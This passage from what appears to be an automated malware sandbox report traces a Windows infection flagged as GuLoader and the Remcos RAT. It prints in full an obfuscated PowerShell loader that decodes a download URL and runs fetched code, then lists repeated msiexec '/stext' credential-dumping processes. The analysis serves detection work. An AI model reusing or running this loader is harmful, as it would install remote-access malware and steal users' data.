');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
                                                      Imagebase:0x7ff7b2bb0000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:05:06:06
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff620390000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:05:06:14
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;"
                                                      Imagebase:0x7c0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1653204525.00000000083F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.1653381480.0000000008BD7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.1635429037.0000000005943000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:05:06:14
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff620390000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:05:06:37
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:15
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:05:06:58
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:05:06:59
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:05:06:59
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:41
                                                      Start time:05:06:59
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
